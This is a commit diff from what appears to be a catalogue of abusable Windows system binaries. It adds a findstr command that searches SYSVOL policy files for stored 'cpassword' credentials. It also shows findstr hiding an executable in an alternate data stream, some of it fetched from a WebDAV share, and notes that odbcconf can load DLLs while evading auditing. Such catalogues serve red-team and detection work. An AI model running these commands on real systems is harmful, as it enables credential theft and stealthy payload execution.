Added and adjusted
parent
d3403eae69
commit
dea250c754
|
@ -0,0 +1 @@
|
||||||
|
"notes.txt"
|
|
@ -4,7 +4,7 @@ to send me a tweet and I will add the contribution for you.
|
||||||
|
|
||||||
## Binary.exe
|
## Binary.exe
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search
|
||||||
|
|
||||||
```
|
```
|
||||||
Example
|
Example
|
||||||
|
|
|
@ -40,6 +40,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
||||||
[Regasm.exe](OSBinaries/Regasm.md)
|
[Regasm.exe](OSBinaries/Regasm.md)
|
||||||
[Regsvcs.exe](OSBinaries/Regsvcs.md)
|
[Regsvcs.exe](OSBinaries/Regsvcs.md)
|
||||||
[Regsvr32.exe](OSBinaries/Regsvr32.md)
|
[Regsvr32.exe](OSBinaries/Regsvr32.md)
|
||||||
|
[Robocopy.exe](OSBinaries/Robocopy.md)
|
||||||
[Replace.exe](OSBinaries/Replace.md)
|
[Replace.exe](OSBinaries/Replace.md)
|
||||||
[Rundll32.exe](OSBinaries/Rundll32.md)
|
[Rundll32.exe](OSBinaries/Rundll32.md)
|
||||||
[Runscripthelper.exe](OSBinaries/Runscripthelper.md)
|
[Runscripthelper.exe](OSBinaries/Runscripthelper.md)
|
||||||
|
|
|
@ -1,11 +1,13 @@
|
||||||
## Findstr.exe
|
## Findstr.exe
|
||||||
|
|
||||||
* Functions: Add ADS
|
* Functions: Add ADS, Search
|
||||||
|
|
||||||
```
|
```
|
||||||
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||||
|
|
||||||
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
||||||
|
|
||||||
|
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
|
|
|
@ -16,6 +16,7 @@ Code sample:
|
||||||
Resources:
|
Resources:
|
||||||
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
||||||
* https://github.com/woanware/application-restriction-bypasses
|
* https://github.com/woanware/application-restriction-bypasses
|
||||||
|
* https://twitter.com/subTee/status/789459826367606784
|
||||||
|
|
||||||
Full path:
|
Full path:
|
||||||
```
|
```
|
||||||
|
@ -24,6 +25,9 @@ c:\windows\sysWOW64\odbcconf.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
Notes:
|
Notes:
|
||||||
Samples can be found in the resources.
|
Text from @subtee tweet:
|
||||||
|
```
|
||||||
|
Loads Dll from path in my.rsp.
|
||||||
|
Hide from command line auditing watching for regsvr32
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,28 @@
|
||||||
|
## Robocopy.exe
|
||||||
|
|
||||||
|
* Functions: Copy
|
||||||
|
|
||||||
|
```
|
||||||
|
Robocopy.exe - Needs example
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* Name of guy - @twitterhandle
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [NameOfLink](Payload/NameOfPayload)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://linktosomethingusefull.com
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\binary.exe
|
||||||
|
c:\windows\sysWOW64\binary.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Some specific details about the binary file.
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue